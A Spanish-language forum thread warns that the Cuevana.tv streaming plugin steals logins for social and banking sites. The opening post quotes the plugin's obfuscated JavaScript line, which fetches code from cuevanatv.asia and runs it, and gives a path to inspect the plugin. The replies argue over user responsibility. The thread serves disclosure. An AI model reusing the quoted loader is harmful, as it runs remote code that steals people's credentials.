Cuevana, conocida web de streaming instala malware en tu ordenador.

Archivado
Imagen

Cuevana.tv, la conocida web de visionado online usada por varios millones de personas ha sido reportada como una web de "phising" (robo de datos sensibles) al detectar que el plugin que utiliza para supuestamente hacer streaming de los contenidos, contiene codigo malicioso utilizado para robar tus datos de redes sociales como Facebook e incluso de sitios de banca online como Banco Santander, Paypal y otros servicios de pago generalmente latinoamericanos.

Al parecer, al intentar visionar contenido de su sitio, éste pide autorización para instalar un complemento (plugin) para tu navegador (tanto firefox como chrome).
Este complemento aparentemente inofensivo resulta tener escondido en su código un script que contacta con el sitio web http://cuevanatv.asia que contiene codigos en JavaScript para efectuar el robo de tus datos personales cada vez que rellenas un formulario en un sitio de confianza.

Se recomienda encarecidamente a todas las personas que alguna vez hayan visitado este conocido portal de streaming que revisen sus navegadores y eliminen el plugin "Cuevana Streaming".
Despues de este procedimiento es obligatorio cambiar todas tus claves que hayan podido ser interceptadas por este script malicioso.


Si deseas investigar el plugin, solo necesitas descargarlo desde hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi y extraerlo con un descompresor de archivos (WinRar, 7Zip...), despues abre el archivo "script-compiler.js" que encontrarás en la carpeta "content".
Una vez abierto ese archivo observa la linea número 232.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 0=7 5();0.4(\'1\',\'2://3.8/h.9?\'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.split('|'),0,{}))
En ella se encuentra este fragmento de código que lanza una petición hacia la web http://cuevanatv.asia que es la que captura los datos personales.


Muchos usuarios ya estan haciendo eco de la noticia bajo los hashtag #Cuevana y #CuevanaRoba


__________________
Texto redactado por RME, fuente de la noticia http://www.forocoches.com/foro/showthread.php?t=2923803
Sinceramente y sin ánimo de ofender, el que a dia de hoy se instala un plugin de una página de ese tipo asi por las buenas en su PC es un botarate de primera. ¿Que os hace pensar que una página que te ametralla con spam y publicidad engañosa necesite de un plugin para hacer lo mismo que hacen millones de webs sin necesidad de ese plugin? Es que es de lógica humana. Pero bueno, es mejor así. Mientras siga habiendo gente tonta e ignorante pululando por internet; los informáticos seguiremos consiguiendo toneladas de dinero facil.
nekuro escribió:Sinceramente y sin ánimo de ofender, el que a dia de hoy se instala un plugin de una página de ese tipo asi por las buenas en su PC es un botarate de primera. ¿Que os hace pensar que una página que te ametralla con spam y publicidad engañosa necesite de un plugin para hacer lo mismo que hacen millones de webs sin necesidad de ese plugin? Es que es de lógica humana. Pero bueno, es mejor así. Mientras siga habiendo gente tonta e ignorante pululando por internet; los informáticos seguiremos consiguiendo toneladas de dinero facil.


Mi padre y su pc XD

Cada semana le hago una limpieza y hay veces que es inevitable que joda el windows al intentar estirpar tales cancer. Un dia de estos formateo y tiro por la ventana al PC y a mi padre [qmparto]

Pero vamos, el que tiene un poco de idea sabe que instalar programas de estos tan a la ligera no es bueno, no hay mejor antivirus que saber navegar por internet y saber que le metes a tu pc.
Estamos de acuerdo, pero tambien hay que pensar que hay MUCHÍSIMA gente (creo que la gran mayoría 80%) que usa el PC solo para mirar el "feisbuc", tuenti, "yutub", ver peliculas (de esta web por ejemplo), jugar y poco mas, no les interesa o no saben manejarse mucho con su SO, y en ese caso confian en sus antivirus, el problema es que esto no lo detectan aun, por eso la gravedad de la noticia y la necesidad de difundirla, esa web a robado la contraseña de miles de personas, y no solo de sus webs preferidas, también de sus bancos, PayPal....
nekuro escribió:Sinceramente y sin ánimo de ofender, el que a dia de hoy se instala un plugin de una página de ese tipo asi por las buenas en su PC es un botarate de primera. ¿Que os hace pensar que una página que te ametralla con spam y publicidad engañosa necesite de un plugin para hacer lo mismo que hacen millones de webs sin necesidad de ese plugin? Es que es de lógica humana. Pero bueno, es mejor así. Mientras siga habiendo gente tonta e ignorante pululando por internet; los informáticos seguiremos consiguiendo toneladas de dinero facil.


Yo estoy dentro del grupo que entendemos, pero tampoco hay que menospreciar a nadie llamandoles tontos e ignorantes pq hay muchisima gente que por unos motivos u otros usa el PC sin saber demasiado lo que hace. Y ademas pienso que no por no entender deben dejar de usar el PC, pq a dia de hoy es necesario para muchas cosas, y por eso esta bien que les avisen,pero tampoco entiendo tu postura de hablar asi de la gente que no entiende pq tú tampoco entenderas mucho de otras cosas y sin embargo no tienes por que entenderlas pq no son necesarias ni prioritarias en tu vida...No todo el mundo tiene por que ser ahora informatico ni entender informatica.
ErJuli2 escribió:
nekuro escribió:Sinceramente y sin ánimo de ofender, el que a dia de hoy se instala un plugin de una página de ese tipo asi por las buenas en su PC es un botarate de primera. ¿Que os hace pensar que una página que te ametralla con spam y publicidad engañosa necesite de un plugin para hacer lo mismo que hacen millones de webs sin necesidad de ese plugin? Es que es de lógica humana. Pero bueno, es mejor así. Mientras siga habiendo gente tonta e ignorante pululando por internet; los informáticos seguiremos consiguiendo toneladas de dinero facil.


Yo estoy dentro del grupo que entendemos, pero tampoco hay que menospreciar a nadie llamandoles tontos e ignorantes pq hay muchisima gente que por unos motivos u otros usa el PC sin saber demasiado lo que hace. Y ademas pienso que no por no entender deben dejar de usar el PC, pq a dia de hoy es necesario para muchas cosas, y por eso esta bien que les avisen,pero tampoco entiendo tu postura de hablar asi de la gente que no entiende pq tú tampoco entenderas mucho de otras cosas y sin embargo no tienes por que entenderlas pq no son necesarias ni prioritarias en tu vida...No todo el mundo tiene por que ser ahora informatico ni entender informatica.

precisamente porque el mal uso del PC puede implicar perdidas economicas, permiteme discrepar con tu opinion.
Todo lo que sea potencialmente peligroso o complejo requiere de una preparación previa, véanse los ejemplos del carné de conducir o de cualquier puesto de cierto riesgo. Con un PC y cero sentido común puede pasar de todo, por lo que no vale la excusa de "no entiendo mucho". Si no, por esa regla, si un dia le pego un tiro a alguien, me puedo escudar en "cómo iba a saber que apretar este gatillo mata".
athlor escribió:
ErJuli2 escribió:
nekuro escribió:Sinceramente y sin ánimo de ofender, el que a dia de hoy se instala un plugin de una página de ese tipo asi por las buenas en su PC es un botarate de primera. ¿Que os hace pensar que una página que te ametralla con spam y publicidad engañosa necesite de un plugin para hacer lo mismo que hacen millones de webs sin necesidad de ese plugin? Es que es de lógica humana. Pero bueno, es mejor así. Mientras siga habiendo gente tonta e ignorante pululando por internet; los informáticos seguiremos consiguiendo toneladas de dinero facil.


Yo estoy dentro del grupo que entendemos, pero tampoco hay que menospreciar a nadie llamandoles tontos e ignorantes pq hay muchisima gente que por unos motivos u otros usa el PC sin saber demasiado lo que hace. Y ademas pienso que no por no entender deben dejar de usar el PC, pq a dia de hoy es necesario para muchas cosas, y por eso esta bien que les avisen,pero tampoco entiendo tu postura de hablar asi de la gente que no entiende pq tú tampoco entenderas mucho de otras cosas y sin embargo no tienes por que entenderlas pq no son necesarias ni prioritarias en tu vida...No todo el mundo tiene por que ser ahora informatico ni entender informatica.

precisamente porque el mal uso del PC puede implicar perdidas economicas, permiteme discrepar con tu opinion.
Todo lo que sea potencialmente peligroso o complejo requiere de una preparación previa, véanse los ejemplos del carné de conducir o de cualquier puesto de cierto riesgo. Con un PC y cero sentido común puede pasar de todo, por lo que no vale la excusa de "no entiendo mucho". Si no, por esa regla, si un dia le pego un tiro a alguien, me puedo escudar en "cómo iba a saber que apretar este gatillo mata".


Venga hombre, no digas cosas sin sentido, creo que te estas saliendo del tema que aqui se habla, te estas yendo por los cerros de Ubeda, demasiado extremismo a mi juicio... Pues entonces resulta que ahora todo el que no entiende de informatica no va a poder usar un PC !!! Una cosa es tocar donde no deben y otra muy distinta es instalar un plugin de un lugar que tanta gente usa y que tan asombrosa noticia ha sido...A ver si ahora todos los plugins que se instalan van a ser potencialmente peligrosos, y que nadie es adivino....Tambien te digo que eso que se ha descubierto no lo hubieran descubierto vamos, ni el 80% de la gente que entiende y posiblemente tambien lo haya instalado...Creo que lo que dices es otra historia muy distinta. Obviamente una persona que no entiende nada le van a hacer lo que quieran en sus cuentas o lo que sea, pera para eso ya esta el sentido comun de cada uno. Mi hermana usa el PC para todas sus cosas, y no entiende mucho de informatica, pero tampoco se mete en camisas de 11 varas y cuando no entiende algo me pregunta, no por eso va a dejar de usar el PC. Tú estas hablando de un uso a nivel profesional del PC, y el que trabaja en un puesto de responsabilidad con un PC obviamente no va a ser una persona no cualificada, eso es de cajon, para eso estan las personas cualificadas, pero para usar un PC a nivel de usuario en tu casa es otra historia...Como te digo ahi ya entra el buen hacer y la buena cabeza del usuario. Obviamente si yo no entendiera practicamente nada de informatica no me meteria en webs donde mis cuentas, datos importantes o lo que sea de inetres personal estuviesen en peligro, pero de ahí a que una persona se meta en una web que visitan y usan diariamente millones de personas y que te instale un plugin malicioso...para eso hay que mirar el codigo fuente y entenderlo...Obviamente esto ya es cosa de profesionales, pero no pidas a una persona normal que no instale un plugin de una web que en principio es "de confianza" porque no va a entender el motivo.
adri-skater8 está baneado por "troleos reiterados"
ErJuli2 escribió:Venga hombre, no digas cosas sin sentido, creo que te estas saliendo del tema que aqui se habla, te estas yendo por los cerros de Ubeda, demasiado extremismo a mi juicio... Pues entonces resulta que ahora todo el que no entiende de informatica no va a poder usar un PC !!! Una cosa es tocar donde no deben y otra muy distinta es instalar un plugin de un lugar que tanta gente usa y que tan asombrosa noticia ha sido...A ver si ahora todos los plugins que se instalan van a ser potencialmente peligrosos, y que nadie es adivino....Tambien te digo que eso que se ha descubierto no lo hubieran descubierto vamos, ni el 80% de la gente que entiende y posiblemente tambien lo haya instalado...Creo que lo que dices es otra historia muy distinta. Obviamente una persona que no entiende nada le van a hacer lo que quieran en sus cuentas o lo que sea, pera para eso ya esta el sentido comun de cada uno. Mi hermana usa el PC para todas sus cosas, y no entiende mucho de informatica, pero tampoco se mete en camisas de 11 varas y cuando no entiende algo me pregunta, no por eso va a dejar de usar el PC. Tú estas hablando de un uso a nivel profesional del PC, y el que trabaja en un puesto de responsabilidad con un PC obviamente no va a ser una persona no cualificada, eso es de cajon, para eso estan las personas cualificadas, pero para usar un PC a nivel de usuario en tu casa es otra historia...Como te digo ahi ya entra el buen hacer y la buena cabeza del usuario. Obviamente si yo no entendiera practicamente nada de informatica no me meteria en webs donde mis cuentas, datos importantes o lo que sea de inetres personal estuviesen en peligro, pero de ahí a que una persona se meta en una web que visitan y usan diariamente millones de personas y que te instale un plugin malicioso...para eso hay que mirar el codigo fuente y entenderlo...Obviamente esto ya es cosa de profesionales, pero no pidas a una persona normal que no instale un plugin de una web que en principio es "de confianza" porque no va a entender el motivo.

en absoluto el pc es unicamente peligroso en entornos profesionales. De hecho, este tipo de ataques estan pensados para los que no tienen ni idea de qué es un plugin (los tipicos, "a mi me lo preparó mi hijo para que bastara con darle un click").
Cualquiera que quiera usar un PC deberia, como mínimo, dar un curso sobre los programas que va a utilizar. Me hace gracia lo que te he resaltado, ya que no entiendo en qué cabeza entra el concepto de "confianza" cuando una compañía te obliga a instalar un plugin para hacer algo que cientos de otras ofrecen sin necesidad de historias raras.

Y, te repito, estas basuras están pensadas para robar dinero. A lo grande. En mis años de trabajo, he visto decenas de personas con la misma contraseña para facebook, paypal y para los foros de cocina. La frontera informática entre la ignorancia y la estupidez no es TAN fina como para querer exculpar al usuario de dejar las puertas de su casa abiertas al irse, con las joyas asomando y quejarse de que le roban.

Si el phising funciona tan endiabladamente bien y el mejor método de hackeo es la ingeniería social, será por algo.
nekuro escribió:Sinceramente y sin ánimo de ofender, el que a dia de hoy se instala un plugin de una página de ese tipo asi por las buenas en su PC es un botarate de primera. ¿Que os hace pensar que una página que te ametralla con spam y publicidad engañosa necesite de un plugin para hacer lo mismo que hacen millones de webs sin necesidad de ese plugin? Es que es de lógica humana. Pero bueno, es mejor así. Mientras siga habiendo gente tonta e ignorante pululando por internet; los informáticos seguiremos consiguiendo toneladas de dinero facil.


Sin ánimos de ofender, el único "botarate" que hay aquí eres tu.

Que esa pagina haya incluido en su código algo para robar contraseña no quiere decir que no haga falta instalar un pluging como ese para poder hacer streaming tal y como lo hacen en esa pagina.

Son muchas las paginas que utilizan ese sistema de streaming ademas de que son varios los programadores que han diseñado un sistema similar a partir de ese y que precisamente a raíz de el desarrollaron uno basado en java por la inseguridad de instalar plugings.

La próxima vez antes de faltar al respeto a nadie infórmate un poco sobre como funciona esa web y ese sistema de streaming en concreto y así de paso te evitas quedar como un bocachancla.
Está claro que la gente al menos debria tener un minimo de conocimientos informaticos para tratar con PCs, pero el tema que mucha gente por los motivos que sean no pueden o no quieren saber mas de lo que ven mas allá de lo que tienen delante. No por eso deben dejar de usar el PC, simpre que lo hagan de forma razonable, pero ahí esta la razon de cada uno y sus ganas de arriesgar.Todos conducimos vehículos y no por eso tenemos que ser mecánicos ni aprender mecánica, ni tampoco somos tontos.

Y ya paso de seguir hablando más de esto, solo decir que cada uno es libre de hacer lo que quiera, y no por no entender informatica es un ignorante, solo eso, hay formas y formas de decir las cosas. Yo entiendo de informatica y no soy informatico, pero tambien digo que hay muchisimas cosas que no tengo ni idea y me la pueden colar igual ya que hay muchas formas de hacerlo, y algunas muy dificiles de detectar o conocer, por mucha informatica que sepamos. Otra cosa es hacer caso a esos correos spam o robadatos que recibimos que saltan a la vista, otra los archivos ejecutables, plugins o scripts, captadores de teclado...pero hay otras formas que entiendes mucho del tema o ni los hueles.

Y lo de los plugins, como dice el compi Elkri, los hay "buenos y malos", y se usan a pesar de su inseguridad, pero no tienen por qué ser maliciosos (normalmente confiamos en las compañias de software serias y muy conocidas), otra cosa es que sean modificados para ello como en este caso y para tal fin.
Eso os pasa por ver películas online e instalar plugins de páginas sin ninguna confianza.
Elkri escribió:
nekuro escribió:Sinceramente y sin ánimo de ofender, el que a dia de hoy se instala un plugin de una página de ese tipo asi por las buenas en su PC es un botarate de primera. ¿Que os hace pensar que una página que te ametralla con spam y publicidad engañosa necesite de un plugin para hacer lo mismo que hacen millones de webs sin necesidad de ese plugin? Es que es de lógica humana. Pero bueno, es mejor así. Mientras siga habiendo gente tonta e ignorante pululando por internet; los informáticos seguiremos consiguiendo toneladas de dinero facil.


Sin ánimos de ofender, el único "botarate" que hay aquí eres tu.

Que esa pagina haya incluido en su código algo para robar contraseña no quiere decir que no haga falta instalar un pluging como ese para poder hacer streaming tal y como lo hacen en esa pagina.

Son muchas las paginas que utilizan ese sistema de streaming ademas de que son varios los programadores que han diseñado un sistema similar a partir de ese y que precisamente a raíz de el desarrollaron uno basado en java por la inseguridad de instalar plugings.

La próxima vez antes de faltar al respeto a nadie infórmate un poco sobre como funciona esa web y ese sistema de streaming en concreto y así de paso te evitas quedar como un bocachancla.

No me meto en si el sistema funciona o no; solo digo que instalar pluguins en ese tipo de webs es como si te encuentras a un tio con mala pinta en un callejon oscuro con un jaringuilla sucia en la mano y te dice "te doy 500 euros si te inyectas lo que hay en esta jeringuilla". Igual la jeringuilla tiene suero salino inocuo y no te pasa nada, pero yo en particular no me arriesgaría. No se si me explico
ubuntusero escribió:Estamos de acuerdo, pero tambien hay que pensar que hay MUCHÍSIMA gente (creo que la gran mayoría 80%) que usa el PC solo para mirar el "feisbuc", tuenti, "yutub", ver peliculas (de esta web por ejemplo), jugar y poco mas, no les interesa o no saben manejarse mucho con su SO, y en ese caso confian en sus antivirus, el problema es que esto no lo detectan aun, por eso la gravedad de la noticia y la necesidad de difundirla, esa web a robado la contraseña de miles de personas, y no solo de sus webs preferidas, también de sus bancos, PayPal....

totalmente deacuerdo compi,yo me incluyo en ese 80%,gracias a esta clase de informacion voy teniendo mas cuidado al entrar en ciertas paginas.
raider737 escribió:
ubuntusero escribió:Estamos de acuerdo, pero tambien hay que pensar que hay MUCHÍSIMA gente (creo que la gran mayoría 80%) que usa el PC solo para mirar el "feisbuc", tuenti, "yutub", ver peliculas (de esta web por ejemplo), jugar y poco mas, no les interesa o no saben manejarse mucho con su SO, y en ese caso confian en sus antivirus, el problema es que esto no lo detectan aun, por eso la gravedad de la noticia y la necesidad de difundirla, esa web a robado la contraseña de miles de personas, y no solo de sus webs preferidas, también de sus bancos, PayPal....

totalmente deacuerdo compi,yo me incluyo en ese 80%,gracias a esta clase de informacion voy teniendo mas cuidado al entrar en ciertas paginas.

Y eso es encomiable, porque al menos te molestas en leer y aprender buenos habítos poco a poco. Cosa que la mayoría de la gente no hace; lo que hacen es joder el ordenador por no tener ningun cuidado, llorar para que se lo repares, se lo reparas, les dices lo que han hecho mal y les dices como han de hacerlo bien y a los 4 dias ya tienen el ordenador jodido y estan llorando otra vez para que se lo repares.
Según se comenta han sacado una nueva versión del plugin que ya viene "limpia"

http://www.fayerwayer.com/2012/09/un-pl ... -usuarios/
Vaya, pues no sabía de esto..
16 respuestas
Archivado
Volver a El Buffer